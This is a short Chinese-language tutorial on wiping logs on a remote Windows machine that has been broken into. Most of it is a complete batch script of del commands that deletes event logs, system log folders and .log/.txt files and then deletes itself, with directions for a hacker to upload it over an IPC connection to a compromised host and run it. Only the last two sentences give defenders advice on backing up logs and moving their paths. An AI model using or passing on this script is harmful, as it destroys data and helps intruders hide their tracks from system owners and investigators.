今天给大家介绍的清除远程主机上的日志的方法是:自己编写批处理文件来实现。
编写一个能清除日志的批处理非常简单,新建一个文本文档,在其中输入以下内容:
@del c:\windows\system32\logfiles\*.*
@del c:\windows\system32\config\*.evt
@del c:\windows\system32\dtclog\*.*
@del c:\windows\system32\*.log
@del c:\windows\system32\*.txt
@del c:\windows\*.txt
@del c:\windows\*.log
@del c:\del log.bat (实际使用时,视具体位置而定)
把上面的内容保存为log.bat备用。在上面的代码中“@”前缀字符表示执行时本行在命令行或DOS里面不显示。之后黑客通过IPC连接将log.bat文件上传到被入侵主机或肉鸡上,将log.bat文件执行以下就可以了。
除此之外,还可以利用第三方软件等方法来实现清理目的,大体原理都一样。作为管理员应定期备份日志文件,防止被入侵后清空日志。另外可以把日志文件的路径更改,预防黑客用批处理文件清理日志。